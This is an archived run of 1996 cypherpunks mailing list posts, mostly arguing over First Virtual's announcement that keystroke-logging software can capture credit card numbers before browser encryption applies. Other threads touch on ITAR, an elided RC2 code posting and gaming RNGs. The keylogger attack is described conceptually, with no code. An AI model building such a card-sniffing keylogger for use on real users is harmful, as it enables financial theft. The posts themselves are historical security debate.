programmer got the first version of our program running in about a week.
 Aside from our obvious interest in promoting our own commerce
mechanism, we felt that we had an ethical obligation to bring this
problem to the attention of the consumers, banks, and other financial
institutions who could conceivably suffer catastrophic losses if
software encryption of credit card numbers became widespread.

We also realize that we have an obligation to do everything possible to
avoid helping any unscrupulous people who might seek to utilize this
flaw for malicious purposes.  We have accordingly been extremely
responsible in how we have handled our discovery.  We first demonstrated
and explained our program to vital organizations such as CERT (the
Computer Emergency Response Team) and the ABA (American Banking
Association).  Only after many such private disclosures, none of which
revealed any defense against our technique, did we publicly disclose the
existence of this program.

In addition, we have taken several steps to "cripple" our demonstration
program, all of which will be discussed below.    Furthermore, we have
NOT made the program itself generally available.  We are currently
demonstrating it to selected financial institutions and government
agencies, and will provide copies of the program only to CERT and a few
other independent security-minded organizations.  We have also alerted
Netscape to the problem as part of their "bugs bounty" program.  At some
future date, we might conceivably distribute the program, in binary form
on CD ROM, to selected financial institutions.  The source code will
always be very closely guarded.  Unfortunately, however, the general
method of attack is extremely easy to duplicate, and we don't know of
any good way to alert the public to the problem without explaining it.

THE TECHNIQUE

Our basic approach was to write a computer program that runs undetected
while it monitors your  computer system. A sophisticated version of such
a program can intercept and analyze every  keystroke, mouse-click, and
even messages sent to your screen, but all we needed was the keystrokes.
Selectively intercepted information can be immediately and secretly
transmitted via  Internet protocols, or stored for later use.

First Virtual's research team has built and demonstrated a particular
implementation of such a program, which only watches for credit card
numbers.  Whenever you type a credit card number into your computer --
even if you are talking to "secure" encryption software -- it captures
your card number.  Our program doesn't do anything harmful with your
credit card number, but merely announces that it has captured it.  A
malicious program of this type could quietly transmit your credit card
number to criminals without your knowledge.

The underlying problem is that the desktop -- the consumer's computer --
is not secure.  There is no way of ensuring that all software installed
on the consumer's machine can be trusted.  Given this fact, it is unwise
to trust ANY software such as a "secure" browser, because malicious
software could have easily been interposed between the user and the
trusted software.

The bottom line for consumers is that, on personal computers,
INFORMATION IS INSECURE THE MOMENT YOU TOUCH A KEY.  We  have
dramatically proven that security  ends the moment you type sensitive
information into your computer. The vulnerability lies in the fact that
information must travel from your  keyboard, into your computer's
operating system, and then to your "secure" application. It can be
easily intercepted along the way.

This kind of insecurity is very frightening, and has implications far
beyond credit card theft.  However, credit cards embody and demonstrate
the kind of information that is MOST vulnerable to this kind of attack.
Credit card numbers are far more vulnerable to this kind of attack than
most other forms of information because of the following particular
characteristics of credit card numbers:

-- Credit card numbers are easily recognized by simple pattern recognition.
-- Credit card numbers are "one way" financial instruments, with no
user-level confirmation or verification required for their use.
-- Credit card numbers are of direct financial value.

In short, credit card numbers are an almost perfect example of how NOT
to design a payment instrument for an insecure public computer network
such as the Internet.

DETAILS:  HOW TO TOTALLY UNDERMINE SOFTWARE ENCRYPTION OF CREDIT CARDS

First Virtual's demonstration credit-card interception program, once
installed, observes every keystroke that you type, watching for credit
card numbers.  It recognizes credit card numbers with almost perfect
accuracy, because credit card numbers are specifically designed to match
a simple, self-identifying pattern, including a check digit.  Our
program is even smart about punctuation and simple editing functions, so
that nearly any credit card number that you type into your computer is
immediately recognized as such by this program.

When our program spots a credit card number, it immediately plays a
warning sound and pops up a window on your screen, including an iconic
representation of the type of credit card that you have just entered,
along with a clear explanation of what has just happened.  The current
program works only on Microsoft Windows (Windows 3.1, Windows NT, and
Windows 95), but we believe that it would be simple to implement on
Macintosh and UNIX systems as well.  The program doesn't exploit any
"holes" or bugs in the operating system.  It uses existing, necessary
operating system facilities which are part of the published Windows API,
and which are necessary for the implementation of screen savers,
keyboard macros, and other important software packages.

First Virtual's intent is to educate the public, certainly not to
endanger it.  For that reason, our program incorporates four important
precautions intended to prevent any possibility of harm:

1)  Our program is not self-replicating.  While a malicious program
exploiting the same security flaw could easily be embedded in a virus,
spreading itself all over the world, that was not our goal.  Instead,
the program must be deliberately and manually installed on each computer
on which it is to run.

2)  Our program always puts up an icon on your screen when it is
watching your keystrokes.  This is certainly not necessary, and it is
clear that a malicious program would be unlikely to do this.

3)  Our program is easy to remove from your computer, and even offers an
"Uninstall" button to the user.  Obviously a malicious program would
hide itself as well as possible, and make itself as hard to remove as
possible.

4)  Our program never transmits your credit card over the Internet.
While a program using this approach could transmit your information to a
criminal in a totally untraceable manner, we would never do anything
like that.  In fact, we erase your credit card number from our program's
memory before we even tell you that we've seen it, thus making sure that
the credit card number can't even be retrieved by an inspection of our
program's memory.

It is frankly difficult to overstate the severity of the problem
demonstrated by our program.  A clever criminal could use viral
techniques to spread a malicious program based on the same approach, and
would be no more likely to be caught in the act than the authors of any
of the computer viruses that plague the world today.  Once it detects a
credit card number, a criminal program could use any of several
techniques to send that number to the original criminal without
providing any way to trace the criminal's receipt of it.  (If you're
skeptical about this claim, we'd prefer to talk with you privately, as
we've never seen the "best" methods for doing this spelled out in
public, and we would prefer to keep it that way.)  Altogether, this
means that if millions of credit card numbers were being typed into
Internet-connected personal computers, a criminal could obtain a
virtually unlimited supply of card numbers for his own use.  In fact,
for all we know this could already be happening today.  The first
visible sign of such an attack, if it were well-executed, would be a
gradual rise in the overall rate of credit card fraud.

POSSIBLE SOLUTIONS

First Virtual believes that the flaw we have uncovered is fatal.  In the
foreseeable future, all commerce schemes based on software encryption of
credit cards on the desktop are completely vulnerable to this sort of
attack.

The basic problem is that software encryption of credit cards is
predicated on the notion of "trusted software".  On the consumer
computing platforms, however, general purpose operating system
functionality makes it unwise to assume too strong a level of trust in
such software.  No operating system with anything less than
military-grade security (B2) is likely to be safe from an attack such as
this one.

This does not mean that Internet commerce is dead.  Any scheme that is
not based on self-identifying one-way financial instruments such as
credit cards will be essentially unaffected by this problem.  Moreover,
even credit cards may be made safe on the Internet using one of two
approaches:  secure hardware add-ons and the First Virtual approach.

First Virtual's Internet Payment Systems never places the consumer's
credit card number on the Internet.  Instead, the consumer provides it
to us by telephone when the account is opened.  After that, all
purchases are made using a "Virtual PIN".  Virtual PINs are essentially
Internet aliases for underlying payment mechanisms such as credit card
numbers, but with several kinds of added security.  Virtual PINs are
free-form text, with no recognizable pattern, which makes them much
harder to detect with the kind of attack we have just demonstrated.
Moreover, Virtual PINs are only usable in conjunction with First
Virtual's unique email verification process.  No payment is made until
the consumer confirms an email query, which means that defrauding First
Virtual is a multi-step process that is extremely difficult to automate.
 (For more details, we recommend our paper, "Perils and Pitfalls of
Practical CyberCommerce", available via ftp from
ftp://ftp.fv.com/pub/nsb/fv-austin.txt.)

The bottom line, once again, for those of you who have read this far:

NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

There's simply no other way to keep credit cards safe on the net.  The
program we have demonstrated completely undermines the security of all
known programs that claim to handle credit card numbers safely on the
Internet.
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com

    Vin McLellan +The Privacy Guild+ <vin@shore.net>
 53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Wed, 31 Jan 1996 00:52:01 +0800
To: cypherpunks@toad.com
Subject: Vladimir: put up or shut up
Message-ID: <Pine.SUN.3.91.960129162111.27262B-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Most of the recent cypherpunks traffic from Vladimir has been a 
reiteration of the position that discussing ITAR is bad because it 
discourages cypherpunks from releasing good crypto software.

Well, here's one cypherpunks who recently released some software, and
futhermore did so making significant (some might say extreme) concessions
to the ITAR rules. I made the software available only on an 
export-restricted Web server, and asked explicitly several times for it 
not to be exported. If my timezone math works out right, it took about 
half an hour for it to be available on utopia. The ITAR did _nothing_ to 
stop, or even slow down, the reease of my software.

Why is it, then, that we still don't have usable strong crypto tools?  I'd
say the reason is complex, much more so than could be explained by a
simple conspiracy theory or even too much discussion of ITAR. The main
reason is that it is very damned hard to write good crypto-enabled
applications.  Trust me, I know. I have done the best I could with the
software I released, but I'm still quite frustrated with its limitations,
especially with respect to nontechnical users. 

Ultimately, to create really good crypto-enabled applications, it's going 
to take money. And there's where ITAR is most effective. If the powers 
that be disapprove of your software, then there goes your foreign market. 
There go your government sales. There go those "strategic alliances" with 
the other companies in the market, because the pressure can be applied 
transitively too. ITAR is actually only a small part of the process.

Still, free software has a lot of vitality left in it. It's still strong 
at blazing new trails in software design. Where it's weak (and this is 
what really counts now), is being usable, easy to learn, and easy to 
install. I think if we explicitly work towards these goals, there's hope 
for great free crypto-enabled applications. Hell, PGP came pretty close, 
and it's saddled with all kinds of lousy design decisions.

But back to Vladimir: instead of whining at us about how our fear of the
law is hurting the acievement of our goals, why don't _you_ write that
killer crypto-app and distribute it to the world? Who's stopping you? 

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 19:16:13 +0800
To: "W. Kinney" <kinney@bogart.Colorado.EDU>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <199601292130.OAA18538@bogart.Colorado.EDU>
Message-ID: <wl3IB6aMc50e8WYD4I@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. "W.
Kinney"@bogart.Color (381*)

> Followed by an hysterical essay on how FV has "discovered" the keyboard
> sniffer. Oh, please. You people should be ashamed of yourselves.

I trust you've seen by now that we made no claim to have discovered
keyboard sniffers.  Please read our claims more carefully, and I'd be
delighted to discuss them rationally.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 11:30:57 +0800
To: mka@pobox.com (Matts Kallioniemi)
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <9601292131.AA24346@toad.com>
Message-ID: <wl3IFIiMc50eMWY0Nd@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Matts
Kallioniemi@pobox. (710*)

> This problem is greatly exagerated. The software simply won't be running in
> the average users machine.

> If the program propagates like a virus, it will soon be catched and killed
> by the anti-virus utilities that any responsible user is already running on
> a regular basis.

No need to do it as a virus, unless you count "social attacks" as
viruses.  The IBM Christmas Exec came as plain text email that
*persuaded* the reader to run it.  The average consumer is easily
fooled. "Download this neat program that does X, Y, and Z."  If it
really does those things, you need never suspect that it also planted a
keyboard sniffer.

> If you have to start the program for it to do its magic, then just don't
> start it. Todays computer users should know that running software you don't
> trust is generally a bad idea. That's how you get a virus in the machine in
> the first place...

If your idea of "today's computer users" comes from cypherpunks, you're
living in a dream world.  FV's experience with average Internet users
includes some who ask us not to use complicated "technical terms" like
"cut and paste".  They certainly can't be counted on to know which
software to download and which to avoid.

> Come on Nathaniel, admit it, it's a scam to sell FV's expensive services!

I'm kind of surprised that nobody on this list has realized that this
attack is actually a very good argument for digital cash.  FV is by no
means the only technology that can be made immune to this kind of
attack.  It's just that software encryption of credit card numbers is an
amazingly vulnerable technology.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 30 Jan 1996 09:50:38 +0800
To: cypherpunks@toad.com
Subject: Page one, NY Times, 29 January 1996
Message-ID: <199601292207.RAA25259@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


One of those microscopic bottom-of-page-one ads from John Young:
"BOYCOTT ESPIONAGE-ENABLED SOFTWARE", with phone number and email
address to contact for more information.

I'd be curious as to what the response has been like.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Tue, 30 Jan 1996 12:23:45 +0800
To: cypherpunks@toad.com
Subject: Alleged-RC2 code posted to sci.crypt
Message-ID: <Pine.SUN.3.91.960129171039.8487A-100000@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I'm surprised I haven't seen a mention of this here.

Path: agate!usenet.ins.cwru.edu!slider.bme.ri.ccf.org!kira.cc.uakron.edu!neoucom.edu!news.ysu.edu!news.ecn.uoknor.edu!news.eng.convex.com!hermes.oc.com!news.unt.edu!cs.utexas.edu!howland.reston.ans.net!news.nic.surfnet.nl!sun4nl!xs4all!utopia.hacktic.nl!not-for-mail
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Newsgroups: sci.crypt
Subject: RC2 source code
Date: 29 Jan 1996 06:38:04 +0100
Organization: Hack-Tic International, Inc.
Lines: 182
Sender: remailer@utopia.hacktic.nl
Message-ID: <4ehmfs$6nq@utopia.hacktic.nl>
NNTP-Posting-Host: utopia.hacktic.nl
Comments: Hack-Tic may or may not approve of the content of this posting
Comments: Please report misuse of this automated remailing service to
Comments: <postmaster@utopia.hacktic.nl>


/**********************************************************************\
* To commemorate the 1996 RSA Data Security Conference, the following  *
* code is released into the public domain by its author.  Prost!       *
*                                                                      *
* This cipher uses 16-bit words and little-endian byte ordering.       *
* I wonder which processor it was optimized for?                       *
*                                                                      *
* Thanks to CodeView, SoftIce, and D86 for helping bring this code to  *
* the public.                                                          *
\**********************************************************************/

[potential trade secret and ITAR violation elided]

   So far, no confirmations, denials, or test vectors posted.

   If true, this removes my biggest objection to S/MIME (leaving all the 
nonbiggest objections in place, of course).

Raph




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@rdxsunhost.aud.alcatel.com (Daniel R. Oelke)
Date: Tue, 30 Jan 1996 11:50:40 +0800
To: nsb@nsb.fv.com
Subject: Re: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
Message-ID: <9601292318.AA20907@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain




> 
> 2.  It has nothing to do with viruses.  No current virus protection
> program will ever detect this thing, and if you write a program that
> detects one instantiation of the attack, the program can be easily
> changed to require a new "detector" program.  This means you can only
> protect against the last attack, not the next one.

It has *everything* to do with viruses.  Your program is not a virus
BUT the press release tells the "danger" of trusting your own computer.
If your own computer is doing something other than what the 
software on it is advertised as doing you have a virus, or trojan 
horse like a dirty-picture-viewer-with-keyboard-capture.

Virus's and trojan horses are nothing new.  The detector programs
keep up with them quite nicely and make a good buck doing it.

As for the technical content of the program - I'ld hack up
a DOS version tonight if I thought it was worth my effort
to drag the PC compiler/assembler out of mothballs.  (I don't
do MS-Windows).  A weeks time is more that enough for any 
technically competent programmer to do the capture and add in
the Windoze bells and whistles.

I find that FV's hype on this is nothing but a thin disguise 
for a selling of their product.  Come-on guys.  Sell your
product, not FUD.

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Weld Pond <weld@l0pht.com>
Date: Tue, 30 Jan 1996 17:21:55 +0800
To: cypherpunks@toad.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <Pine.BSD/.3.91.960129170118.14124A-100000@l0pht.com>
MIME-Version: 1.0
Content-Type: text/plain



Nathaniel Borenstein <nsb@nsb.fv.com> writes:

>The attack we've outlined -- and partially demonstrated -- is based on
>the combination of several known flaws:
>
> -- It's easy to put malicious software on consumer machines
> -- It's easy to monitor keystrokes
> -- It's trivial to detect credit card numbers in larger data streams
> -- It's easy to disseminate small amounts of information tracelessly

But take away the inputting of the credit card number via keystroke and 
the flaw disappears.  How would your program deal with a scheme like 
this?  

Programs needing secure entry create a "secure entry field" which is
really just an imagemap with the digits (and alphas if required) placed
randomly about.  The user then uses the mouse to click on these numerals. 
Ideally the graphics that represent the numerals would be drawn from a
random pool and are misformed to thwart any OCR attempts. The graphics 
could be made even more difficult to OCR by mixing in words and pictures 
to represent the numbers.

An even better solution may be to have the imagemap generated by the 
server and just the mouse clicks sent back to be decoded on the server.  
That is how server side imagemaps work now over the web.  It shouldn't be 
hard to take credit card numbers this way.  
 

      Weld Pond   -  weld@l0pht.com      -     http://www.l0pht.com/
      L  0  p  h  t    H  e  a  v  y    I  n  d  u  s  t  r  i  e  s          
      Technical archives for the people  -  Bio/Electro/Crypto/Radio

      L0pht Open House 2/3/96 at 8:00pm - Live on irc #l0pht - write
      root@l0pht.com for details.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 17:25:16 +0800
To: trei@process.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
In-Reply-To: <9601292111.AA23738@toad.com>
Message-ID: <Al3Ie8GMc50e0WY6IN@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. "Peter
Trei"@acm.org (1233)

> I started reading this thinking it was actually something important. All
> it describes 
> is a keyboard monitor, which greps for CC#s, and which could be spread by an 
> (unspecified) virus, and sends the output to a crook over the net by
> some (unspecified) 
> mechanism.

There are many ways to spread it besides a virus.  Zillions of 'em.  And
there are totally anonymous ways to redistribute it, some of which I've
never seen described publicly, which is why they were left unspecified.

> It's sort of interesting that "Nathaniel Borenstein" has a PGP key, but
> failed to 
> clearsign this message, which loudly trumpets it's great import.
> Considering the
> lack of actual content, I feel compelled to warn readers that this may
> be a forgery, 
> designed to make him look like he's scaremongering. 

Do you have my key in your key ring?  I rather  doubt it.  So what good
would it have done?  

Have you downloaded my key from the net?  Assume that you have.  How do
you know it's mine?

I use PGP about 20 times per day.  I use it in a manner that is
*meaningful*.  Unless we have in some way or another verified each
others' keys, it is meaningless for me to sign a message to you. 
Putting a PGP signature on a message to someone who has no way of
verifying your keys is a nice political statement, but is utterly
meaningless in terms of adding any proof of the sender's identity.  --
Nathaniel

PS -- On the off chance that anyone really doubts this is me, I will
shortly send cypherpunks a message that has my own voice AND a PGP
signature thereupon.  That way, you can check my identity if you either
recognize my voice OR have verified my fingerprint.  Sheesh.  -- NB




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 30 Jan 1996 11:07:55 +0800
To: pmonta@qualcomm.com>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <199601292201.OAA00356@mage.qualcomm.com>
Message-ID: <4l3Iox2Mc50eMWY=8n@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 29-Jan-96 Re: FV Demonstrates Fatal F.. Peter
Monta@qualcomm.com (651*)

> Of course, host security is important, but what is the rationale
> for panic, given the tools available?  Heavens.

It's the potential for large-scale automated untraceable attack.

> > NEVER TYPE YOUR CREDIT CARD NUMBER INTO A COMPUTER.

> Never speak it either.  Walls (and audio peripherals) have ears.

When you can give me a cheap device that can be planted in the wall,
listen to everything you say, and just spit out the credit card numbers,
then I'll start to be worried about speaking it.  

Until then, what we've just unveiled has no audio parallel.  -- NB
--------
Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: joseph@genome.wi.mit.edu (Joseph Sokol-Margolis)
Date: Tue, 30 Jan 1996 17:17:15 +0800
To: cypherpunks@toad.com
Subject: Re: FL Demonstrates Fatal Flaw in Logins
Message-ID: <v02140a03ad32fed1edf8@[18.157.1.107]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry to all, but I'm not seeing what would appear to be obvious.
There seems to be a lot of talk about FV "new program" that undermines
security of computer login/credit cards over the net and such like that. I
don't know about you guys, but I wrote stuff like that in sixth grade on
the old apple IIe. It's pretty simple to write a programs that attaches
itself to the keyboard driver and logs the text types, or only logs certain
parts, what is the large deal? As it applies to internet security, I don't
see how it can make a difference. It must be run from the local computer,
at system level. If I'm on my home computer, I know what's running, and
feel safe that a loging program isn't amung them. What would enable a
remote site to pick up my typings.
However, I don't know much about Java, would it be possible to make such an
applet with Java?

--Joseph

--------------------------------------------------------------------------------
Joseph Sokol-Margolis                                   joseph@genome.wi.mit.edu
Assistant Systems Administrator                                     seph@mit.edu
Whitehead Institute/MIT
Center for Genome Research                                 phone: (617) 252-1922
One Kendall Sq. Bldg. 300                                    fax: (617) 252-1902
Cambridge, MA 02139-1561
----------------------http://www-genome.wi.mit.edu/~joseph/-----------------
----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 31 Jan 1996 00:50:29 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Signal to noise..
In-Reply-To: <v02140a01ad32440a4bf4@[165.254.158.237]>
Message-ID: <199601292310.SAA04697@homeport.org>
MIME-Version: 1.0
Content-Type: text


The S/N ratio has been *really* low lately.

Before sending mail to cypherpunks, please take a minute to do a few
things:

1.  Catch up.  No one is impressed that you too are not bowled over by
(e.g.) FV thinking about keyboard scanners.  One or two 'Get real'
messages would suffice.  (I understand that messages often cross in
the net.)

2.  Consider the goals of cypherpunks: To write code that enhances the
freedom and privacy of individuals.  Monkey wrench the forces of evil.
Arbitrage regulatory bodies to our best advantage.  Have a good time,
and make lots of money doing it, should we so please.

3.  Decide if your post really contributes anything to a list of ~1000
people.  Could this go in a private response?  If you're not sure,
take a guess what Perry would say.  If you think he'd flame, try to
justify your post at the top. Anticipate counter arguments.  Do so in
the spirit of discovery, expecting perhaps that you'll decide the
message shouldn't go out.  I don't send over half the messages I start
to write on this standard.

4.  Pay attention to basic points of netiquette, such as making clear
what is your text, and what was posted by someone else.  Don't quote
more than is needful.

5.  Consider spending some time installing a Mixmaster remailer. :)

Mixmaster is available from http://obscura.com/ and my easy to use
installer script is available by sending me a message with a Subject
line of "get mix-installer" (without quotes.)  It will have a web page
in a few days, when I need a break from writing other useful Mixmaster
add-ons.


| When the world community has a double standard when it comes to treating
| Isreal's actions differently from any other country, those "warlords" might

PS to PHB - Reminds you of old times, doesn't it? ;)


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Roessler <Thomas.Roessler@sobolev.rhein.de>
Date: Tue, 30 Jan 1996 05:50:15 +0800
To: cypherpunks@toad.com
Subject: [FACTS] Germany, or "Oh no not again"
Message-ID: <199601291710.SAA13359@sobolev.rhein.de>
MIME-Version: 1.0
Content-Type: text/plain


I had the prosecutor's spokesman on phone today.  The result is
that someone gave a hint to the prosecutors which explicitly
mentioned Zundel, T-Online and Compuserve.  Consequently, the
prosecutors *had* to start investigations against Zundel,
T-Online and Compuserve.  In particular, they are right now
*checking* whether providing internet access is a criminal
offence due to the possibility to gain access to `inciting
material' (the German word is `Volksverhetzung') via the Net.

This means that it is not even clear whether the investigations
against internet providers will be dropped or not; in fact many
people believe that these investigatinos *will* be dropped.

My personal guess about all this is that some net.citizens are
trying to have the prosecutors engaged in absolutely absurd
investigations (or, even better, achieve a court room clash on
this subject) to get some clarification of the legal situation of
the Net in Germany.  Quite similar to the RSA T-Shirt story in
the States. ,-)

tlr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: baum@apple.com (Allen J. Baum)
Date: Wed, 31 Jan 1996 11:51:54 +0800
To: cypherpunks@toad.com
Subject: Re: Random number generator question (& Las Vegas)
Message-ID: <v02130506ad3332c4d9eb@[17.255.11.191]>
MIME-Version: 1.0
Content-Type: text/plain


>>fair@clock.org ("Erik E. Fair"  (Time Keeper)) writes:
>>>does anyone know what sorts of random number generators those
>>>electronic games use, and how (if at all) they are measured and regulated
>>>by the Nevada Gaming Commission? They might have something to teach us.

>>Several people who work in the industry said that electronic machines
>>use some sort of PRNG, but with a nice added bit of random input - the
>>player's timing of hitting the buttons. One poster described it as the
>>machine constantly generating numbers, and choosing the payoff based
>>on the last number generated when the user hit a button.

According to a friend who started a company that is going to sell gambling
machines to Las Vegas:

The Nevada Gaming Commission closley regulates the RNGs.  They use Chi
squared tests and others to verify the randomness.  They are not perfect.

Todays slot machines use a Psudo RNG that requires a seed number to make
sure it doesn't short cycle.  They use some time based player input like
coin in or handle pulls to pick a number.  You must discard lots of numbers
or it would be too easy to sync up and predict the answer. (basically
confirming the above)

Nothing is totally immune to tampering.  The gaming commission tries to
make sure the machines are reasonable secure.

**************************************************
* Allen J. Baum              tel. (408)974-3385  *
* Apple Computer, MS/305-3B  fax  (408)974-0907  *
* 1 Infinite Loop                                *
* Cupertino, CA 95014        baum@apple.com      *
**************************************************







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim Oerting <timo@microsoft.com>
Date: Tue, 30 Jan 1996 13:27:48 +0800
To: "nsb@nsb.fv.com>
Subject: RE: FV's Borenstein discovers keystroke capture programs! (pictures at 11!)
Message-ID: <c=US%a=_%p=msft%l=RED-66-MSG960129190324HH007C00@red-02-imc.itg.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain


no doubt all the responses to the cypherpunk list are unnecessary as we all
agree this is a load of PR nonsense. But I just can't believe that he thinks 
that
the telephone is more secure on average than a keyboard.  I can tell pretty 
easily
if something is running on my system that I didn't intend..it is much less 
probably to say that I know that someone isn't listening with a scanner if 
I'm on
a cordless or just plain tapping my line if I'm on a standard phone. 
 Admittedly I
think cell phones may take more effort on the part of the eavesdropper but 
are
still doable.

I'm certain that none of first virtual customers use a cordless phone, 
indeed 
since you feel the telephone is such a secure device you no doubt require
that all of your customers use STUIII phones to communicate. 


----------
From: 	Nathaniel Borenstein[SMTP:nsb@nsb.fv.com]
Sent: 	Monday, January 29, 1996 12:07 PM
To: 	cypherpunks@toad.com
Subject: 	FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards


First Virtual's Internet Payment Systems never places the consumer's
credit card number on the Internet.  Instead, the consumer provides it
      to us by telephone when the account is opened.  
----------
From: 	Nathaniel Borenstein[SMTP:nsb@nsb.fv.com]
Sent: 	Monday, January 29, 1996 1:39 PM
To: 	cypherpunks@toad.com; dmacfarlane@zip.sbi.com
Subject: 	Re: FV's Borenstein discovers keystroke capture programs! 
(pictures at 11!)

Well, the mis-conceptions are flying fast and furious.

You're twisting our words.  We believe it is a truly fatal flaw in those
internet commerce schemes that are based on software encryption of
credit card numbers.  There are several schemes for Internet commerce
that are unaffected:

	-- First Virtual (of course)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 30 Jan 1996 10:34:54 +0800
To: nsb@nsb.fv.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
Message-ID: <9601300006.AA15845@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>It's considerably more than that.  Please read on.

No, Nathaniel, it is not.  You watch keystrokes and record the ones you're
interested in.  This technique has interesting possibilities, but all your
PR screaming won't make it anything more than what it is.

How interesting are these possibilities?  It's hard to say.  Don't run
software you don't trust.  Well, most of the people on this list probably
already know that.  I betcha a good-sized portion of the computer-using
populace knows this, but actively (or passively) defers the choice to
someone else.

You must trust something.  You folks trust the telephone (never gets
tapped, right) the postal service (of course mail never gets stolen) banks
or credit card companies (which never have problems).  And then, on top
of that foundation of sand you build a commerce system with MIME and
SMTP (sendmail is the most bugfree program ever written).

I used to think you were aggressive techies, now you're just greedy
bastards who will seemingly stop at nothing; Stef's blatant attempts
to ensure MIME's use in IETF-PAY was not an exception, but the first
salvo.

You make me sorry I invented safe-tcl and made FV possible.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 30 Jan 1996 17:12:29 +0800
To: nsb@nsb.fv.com
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit
Message-ID: <9601300015.AA15891@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>There are many ways to spread it besides a virus.  Zillions of 'em.  And

There are zillions (what, more than one thousand?) ways to get someone
to run a random piece of software that will capture their keystrokes?

I don't believe you.  Name six.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ernest Hua <hua@chromatic.com>
Date: Tue, 30 Jan 1996 13:42:11 +0800
To: zinc <zinc@zifi.genetics.utah.edu>
Subject: Re: FV Demonstrates Fatal Flaw in Software Encryption of Credit Cards
In-Reply-To: <Pine.LNX.3.91.960129134655.184C-100000@zifi.genetics.utah.edu>
Message-ID: <199601300328.TAA13612@chromatic.com>
MIME-Version: 1.0
Content-Type: text/plain



> so what?  fv has a keyboard sniffer...
>
> if you're going to d/l programs from the net and not pay attention to 
> what's going on you'll always be at risk and a fool as well.
>
> for what it's worth, this sort of program could easily be used to get 
> info more important than credit card numbers.  passphrases and 
> passwords of all kinds could be obtained leading to broken accts or 
> worthless cryptography.

I'm quite amazed at the level of ... well ... how can I characterize it
without insulting too many people? ... arrogance? ...

Many of you would be amazed at what motivates the average person to buy
or to use a computer.  Most people, when asked about security, do not
even have a concept, let alone how it applies in a computer environment.

There is far more misinformation and miseducation among the average user
than you might think.  Not everyone understands why they need a modem in
order to get onto the Internet.  Not everyone understands why you need
to sign up for an account with an ISV in order to get onto the Internet.
(You would be amazed at how many people think that just buying a modem
is good enough to get onto the Internet.)

The response is typically, "I don't understand all that technobabble!"
"Just give me something that works!"  "This is too complicated!"

If you think that the dumb user should be left to fight for his/her own
survival on the information highway, you are easily condemning 75% to
90% of the current users.

I am not entirely convinced that Borenstein is totally selfless in his
(or FV's) announcement.  However, the basis of his argument, while it
may not apply to the cypherpunk community, has much merit in the real
world.

